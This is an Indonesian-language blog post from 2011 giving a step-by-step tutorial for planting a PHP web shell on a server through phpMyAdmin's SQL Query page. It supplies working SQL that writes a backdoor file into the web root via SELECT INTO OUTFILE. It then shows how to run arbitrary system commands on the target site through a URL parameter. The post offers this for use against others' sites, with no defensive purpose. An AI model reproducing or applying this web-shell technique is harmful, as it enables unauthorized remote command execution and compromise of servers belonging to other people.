Selasa, 31 Mei 2011

Upload Shell From PhpMyAdmin

Langkah pertama yang kudu kita lakuin setelah Login ke database, masuk ke SQL Query. gak perlu masuk database. langsung aja masuk SQL Query.

Langkah kedua, kita copas code berikut :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Langkah ketiga, langsung kita buka aja di browser. misal :

http://webtarget.com/cmd.php

kalo hasilnya bukan 404, berarti file udah ditanem

Langkah ke-empat, kita eksekusi cmd lewat file tadi make perintah :

http://webtarget.com/cmd.php?cmd=[command-yang-mau-dieksekusi]

selesai,,
moga bermanfaat...
Good Luck,,,

source : http://www.esc-creation.org/showthread.php?tid=6157&page=1


Greetz To : Wendyaja

Tidak ada komentar:

Posting Komentar